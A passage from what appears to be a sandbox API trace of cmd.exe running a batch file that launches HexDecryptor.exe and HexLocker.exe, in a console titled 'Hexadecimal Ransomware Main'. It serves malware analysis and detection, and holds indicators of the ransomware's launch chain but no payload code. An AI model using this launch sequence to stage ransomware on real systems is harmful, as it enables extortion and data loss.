(_String1="start", _String2="VERIFY") returned -3 [0115.732] _wcsicmp (_String1="start", _String2="VER") returned -3 [0115.732] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0115.732] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0115.732] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0115.732] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0115.732] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0115.732] _wcsicmp (_String1="start", _String2="START") returned 0 [0115.732] ??_V@YAXPEAX@Z () returned 0x1 [0115.733] GetProcessHeap () returned 0x1dc256b0000 [0115.733] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256be9c0 [0115.733] GetProcessHeap () returned 0x1dc256b0000 [0115.733] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be9c0, Size=0x34) returned 0x1dc256c3010 [0115.734] GetProcessHeap () returned 0x1dc256b0000 [0115.734] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c3010) returned 0x34 [0115.734] GetProcessHeap () returned 0x1dc256b0000 [0115.734] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x40) returned 0x1dc256bf810 [0115.734] GetStdHandle (nStdHandle=0xfffffff6) returned 0x4c [0115.734] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0115.734] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0115.734] malloc (_Size=0xffce) returned 0x1dc25800120 [0115.735] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0115.735] malloc (_Size=0x4000) returned 0x1dc255c5910 [0115.735] malloc (_Size=0x4000) returned 0x1dc25810100 [0115.735] malloc (_Size=0x4000) returned 0x1dc25814110 [0115.736] malloc (_Size=0x4000) returned 0x1dc25818120 [0115.736] malloc (_Size=0x4000) returned 0x1dc2581c130 [0115.736] malloc (_Size=0x4000) returned 0x1dc25820140 [0115.736] malloc (_Size=0x4000) returned 0x1dc25824150 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="DIR") returned 4 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="ERASE") returned 3 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="DEL") returned 4 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="TYPE") returned -12 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="COPY") returned 5 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="CD") returned 5 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="CHDIR") returned 5 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="RENAME") returned -10 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="REN") returned -10 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="ECHO") returned 3 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="SET") returned -11 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="PAUSE") returned -8 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="DATE") returned 4 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="TIME") returned -12 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="PROMPT") returned -8 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="MD") returned -5 [0115.736] _wcsicmp (_String1="HexDecryptor.exe", _String2="MKDIR") returned -5 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="RD") returned -10 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="RMDIR") returned -10 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="PATH") returned -8 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="GOTO") returned 1 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="SHIFT") returned -11 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="CLS") returned 5 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="CALL") returned 5 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="VERIFY") returned -14 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="VER") returned -14 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="VOL") returned -14 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="EXIT") returned 3 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="SETLOCAL") returned -11 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="ENDLOCAL") returned 3 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="TITLE") returned -12 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="START") returned -11 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="DPATH") returned 4 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="KEYS") returned -3 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="MOVE") returned -5 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="PUSHD") returned -8 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="POPD") returned -8 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="ASSOC") returned 7 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="FTYPE") returned 2 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="BREAK") returned 6 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="COLOR") returned 5 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="MKLINK") returned -5 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="FOR") returned 2 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="IF") returned -1 [0115.737] _wcsicmp (_String1="HexDecryptor.exe", _String2="REM") returned -10 [0115.737] _wcsnicmp (_String1="HexD", _String2="cmd ", _MaxCount=0x4) returned 5 [0115.737] malloc (_Size=0xffce) returned 0x1dc25828160 [0115.738] ??_V@YAXPEAX@Z () returned 0x1dc25828160 [0115.738] GetProcessHeap () returned 0x1dc256b0000 [0115.738] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256db7b0 [0115.740] SetErrorMode (uMode=0x0) returned 0x0 [0115.740] SetErrorMode (uMode=0x1) returned 0x0 [0115.740] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256db7c0, lpFilePart=0x407419e130 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419e130*="Desktop") returned 0x17 [0115.740] SetErrorMode (uMode=0x0) returned 0x1 [0115.740] GetProcessHeap () returned 0x1dc256b0000 [0115.740] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256db7b0, Size=0x62) returned 0x1dc256db7b0 [0115.740] GetProcessHeap () returned 0x1dc256b0000 [0115.740] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256db7b0) returned 0x62 [0115.740] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0115.740] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0115.740] GetProcessHeap () returned 0x1dc256b0000 [0115.740] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bd810 [0115.740] GetProcessHeap () returned 0x1dc256b0000 [0115.740] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256c34a0 [0115.740] GetProcessHeap () returned 0x1dc256b0000 [0115.740] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256c34a0, Size=0x1be) returned 0x1dc256c34a0 [0115.740] GetProcessHeap () returned 0x1dc256b0000 [0115.740] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c34a0) returned 0x1be [0115.740] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.740] GetProcessHeap () returned 0x1dc256b0000 [0115.740] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256c6540 [0115.740] GetProcessHeap () returned 0x1dc256b0000 [0115.740] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256c6540, Size=0x7e) returned 0x1dc256c0ee0 [0115.740] GetProcessHeap () returned 0x1dc256b0000 [0115.740] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c0ee0) returned 0x7e [0115.741] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.741] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe", fInfoLevelId=0x1, lpFindFileData=0x407419dea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419dea0) returned 0x1dc256bf080 [0115.741] FindClose (in: hFindFile=0x1dc256bf080 | out: hFindFile=0x1dc256bf080) returned 1 [0115.741] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0115.741] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0115.741] ??_V@YAXPEAX@Z () returned 0x1 [0115.742] GetStartupInfoW (in: lpStartupInfo=0x407419e520 | out: lpStartupInfo=0x407419e520*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0115.742] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x407419e488 | out: lpAttributeList=0x0, lpSize=0x407419e488) returned 0 [0115.742] GetLastError () returned 0x7a [0115.742] GetProcessHeap () returned 0x1dc256b0000 [0115.742] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x48) returned 0x1dc256bf360 [0115.742] InitializeProcThreadAttributeList (in: lpAttributeList=0x1dc256bf360, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x407419e488 | out: lpAttributeList=0x1dc256bf360, lpSize=0x407419e488) returned 1 [0115.742] UpdateProcThreadAttribute (in: lpAttributeList=0x1dc256bf360, dwFlags=0x0, Attribute=0x60001, lpValue=0x407419e484, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1dc256bf360, lpPreviousValue=0x0) returned 1 [0115.742] CreateProcessW (in: lpApplicationName="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe", lpCommandLine="HexDecryptor.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x407419e4b0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4c, hStdOutput=0x50, hStdError=0x54), lpProcessInformation=0x407419e490 | out: lpCommandLine="HexDecryptor.exe ", lpProcessInformation=0x407419e490*(hProcess=0xa0, hThread=0x9c, dwProcessId=0xcf8, dwThreadId=0xd44)) returned 1 [0115.804] DeleteProcThreadAttributeList (in: lpAttributeList=0x1dc256bf360 | out: lpAttributeList=0x1dc256bf360) [0115.804] GetProcessHeap () returned 0x1dc256b0000 [0115.804] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf360) returned 1 [0115.804] GetLastError () returned 0x715 [0115.804] ResumeThread (hThread=0x9c) returned 0x0 [0115.804] CloseHandle (hObject=0x9c) returned 1 [0115.804] CloseHandle (hObject=0xa0) returned 1 [0115.804] ??_V@YAXPEAX@Z () returned 0x1 [0115.805] ??_V@YAXPEAX@Z () returned 0x1 [0115.805] ??_V@YAXPEAX@Z () returned 0x1 [0115.806] ??_V@YAXPEAX@Z () returned 0x1 [0115.807] ??_V@YAXPEAX@Z () returned 0x1 [0115.808] ??_V@YAXPEAX@Z () returned 0x1 [0115.809] ??_V@YAXPEAX@Z () returned 0x1 [0115.810] ??_V@YAXPEAX@Z () returned 0x1 [0115.813] ??_V@YAXPEAX@Z () returned 0x1 [0115.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0115.816] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0116.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0116.091] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0116.404] _get_osfhandle (_FileHandle=0) returned 0x4c [0116.404] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0116.541] SetConsoleInputExeNameW () returned 0x1 [0116.541] GetConsoleOutputCP () returned 0x1b5 [0116.757] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0116.758] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.955] ??_V@YAXPEAX@Z () returned 0x1 [0116.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0116.958] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0116.959] _get_osfhandle (_FileHandle=3) returned 0xa0 [0116.959] SetFilePointer (in: hFile=0xa0, lDistanceToMove=464, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d0 [0116.959] GetProcessHeap () returned 0x1dc256b0000 [0116.959] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c0ee0) returned 1 [0116.959] GetProcessHeap () returned 0x1dc256b0000 [0116.959] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c34a0) returned 1 [0116.959] GetProcessHeap () returned 0x1dc256b0000 [0116.959] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bd810) returned 1 [0116.959] GetProcessHeap () returned 0x1dc256b0000 [0116.959] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256db7b0) returned 1 [0116.960] GetProcessHeap () returned 0x1dc256b0000 [0116.960] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf810) returned 1 [0116.960] GetProcessHeap () returned 0x1dc256b0000 [0116.960] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3010) returned 1 [0116.960] GetProcessHeap () returned 0x1dc256b0000 [0116.960] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c2fd0) returned 1 [0116.960] GetProcessHeap () returned 0x1dc256b0000 [0116.960] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3380) returned 1 [0116.960] GetProcessHeap () returned 0x1dc256b0000 [0116.960] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0116.960] _get_osfhandle (_FileHandle=3) returned 0xa0 [0116.960] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d0 [0116.960] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x19, lpOverlapped=0x0) returned 1 [0116.961] SetFilePointer (in: hFile=0xa0, lDistanceToMove=485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e5 [0116.961] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=21, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="start HexLocker.exe\r\ne\r\n\r\nktop\r\ne%\\desktop\\HexLocker.exe\r\nexe\r\nWindows\\MicrosoftNTSystem.sys\r\n") returned 21 [0116.961] _get_osfhandle (_FileHandle=3) returned 0xa0 [0116.961] GetFileType (hFile=0xa0) returned 0x1 [0116.961] _get_osfhandle (_FileHandle=3) returned 0xa0 [0116.961] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e5 [0116.961] GetProcessHeap () returned 0x1dc256b0000 [0116.962] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256db7b0 [0116.962] GetProcessHeap () returned 0x1dc256b0000 [0116.962] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256db7b0) returned 1 [0116.962] _wcsicmp (_String1="start", _String2=")") returned 74 [0116.962] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0116.962] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0116.962] _wcsicmp (_String1="IF", _String2="start") returned -10 [0116.962] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0116.962] _wcsicmp (_String1="REM", _String2="start") returned -1 [0116.962] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0116.962] GetProcessHeap () returned 0x1dc256b0000 [0116.962] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0116.962] GetProcessHeap () returned 0x1dc256b0000 [0116.962] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1c) returned 0x1dc256c32f0 [0116.962] GetProcessHeap () returned 0x1dc256b0000 [0116.962] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x2e) returned 0x1dc256c28d0 [0116.962] _tell (_FileHandle=3) returned 485 [0116.962] _close (_FileHandle=3) returned 0 [0116.963] malloc (_Size=0xffce) returned 0x1dc257e0160 [0116.964] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0116.965] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0116.965] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0116.965] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0116.965] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0116.965] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0116.965] _wcsicmp (_String1="start", _String2="CD") returned 16 [0116.965] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0116.965] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0116.965] _wcsicmp (_String1="start", _String2="REN") returned 1 [0116.965] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0116.965] _wcsicmp (_String1="start", _String2="SET") returned 15 [0116.965] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0116.965] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0116.965] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0116.965] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0116.965] _wcsicmp (_String1="start", _String2="MD") returned 6 [0116.965] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0116.965] _wcsicmp (_String1="start", _String2="RD") returned 1 [0116.965] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0116.965] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0116.965] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0116.965] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0116.965] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0116.965] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0116.965] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0116.965] _wcsicmp (_String1="start", _String2="VER") returned -3 [0116.965] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0116.965] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0116.965] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0116.965] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0116.965] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0116.966] _wcsicmp (_String1="start", _String2="START") returned 0 [0116.966] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0117.449] malloc (_Size=0xffce) returned 0x1dc257f0140 [0117.449] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0117.449] malloc (_Size=0xffce) returned 0x1dc25800120 [0117.450] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0117.450] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0117.450] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0117.450] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0117.450] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0117.451] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0117.451] _wcsicmp (_String1="start", _String2="CD") returned 16 [0117.451] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0117.451] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0117.451] _wcsicmp (_String1="start", _String2="REN") returned 1 [0117.451] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0117.451] _wcsicmp (_String1="start", _String2="SET") returned 15 [0117.451] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0117.451] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0117.451] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0117.451] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0117.451] _wcsicmp (_String1="start", _String2="MD") returned 6 [0117.451] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0117.451] _wcsicmp (_String1="start", _String2="RD") returned 1 [0117.451] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0117.451] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0117.451] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0117.451] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0117.452] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0117.452] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0117.452] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0117.452] _wcsicmp (_String1="start", _String2="VER") returned -3 [0117.452] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0117.452] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0117.452] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0117.452] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0117.452] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0117.452] _wcsicmp (_String1="start", _String2="START") returned 0 [0117.452] ??_V@YAXPEAX@Z () returned 0x1 [0117.454] GetProcessHeap () returned 0x1dc256b0000 [0117.454] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4c) returned 0x1dc256bea80 [0117.454] GetProcessHeap () returned 0x1dc256b0000 [0117.454] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bea80, Size=0x2e) returned 0x1dc256c2b50 [0117.454] GetProcessHeap () returned 0x1dc256b0000 [0117.454] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c2b50) returned 0x2e [0117.454] GetProcessHeap () returned 0x1dc256b0000 [0117.454] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x3a) returned 0x1dc256bf360 [0117.454] GetStdHandle (nStdHandle=0xfffffff6) returned 0x4c [0117.454] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0117.454] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0117.454] malloc (_Size=0xffce) returned 0x1dc25800120 [0117.456] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0117.457] malloc (_Size=0x4000) returned 0x1dc255c5910 [0117.457] malloc (_Size=0x4000) returned 0x1dc25810100 [0117.457] malloc (_Size=0x4000) returned 0x1dc25814110 [0117.457] malloc (_Size=0x4000) returned 0x1dc25818120 [0117.457] malloc (_Size=0x4000) returned 0x1dc2581c130 [0117.457] malloc (_Size=0x4000) returned 0x1dc25820140 [0117.458] malloc (_Size=0x4000) returned 0x1dc25824150 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="DIR") returned 4 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="ERASE") returned 3 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="DEL") returned 4 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="TYPE") returned -12 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="COPY") returned 5 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="CD") returned 5 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="CHDIR") returned 5 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="RENAME") returned -10 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="REN") returned -10 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="ECHO") returned 3 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="SET") returned -11 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="PAUSE") returned -8 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="DATE") returned 4 [0117.458] _wcsicmp (_String1="HexLocker.exe", _String2="TIME") returned -12 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="PROMPT") returned -8 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="MD") returned -5 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="MKDIR") returned -5 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="RD") returned -10 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="RMDIR") returned -10 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="PATH") returned -8 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="GOTO") returned 1 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="SHIFT") returned -11 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="CLS") returned 5 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="CALL") returned 5 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="VERIFY") returned -14 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="VER") returned -14 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="VOL") returned -14 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="EXIT") returned 3 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="SETLOCAL") returned -11 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="ENDLOCAL") returned 3 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="TITLE") returned -12 [0117.459] _wcsicmp (_String1="HexLocker.exe", _String2="START") returned -11 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="DPATH") returned 4 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="KEYS") returned -3 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="MOVE") returned -5 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="PUSHD") returned -8 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="POPD") returned -8 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="ASSOC") returned 7 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="FTYPE") returned 2 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="BREAK") returned 6 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="COLOR") returned 5 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="MKLINK") returned -5 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="FOR") returned 2 [0117.460] _wcsicmp (_String1="HexLocker.exe", _String2="IF") returned -1 [0117.460] _wcsicmp 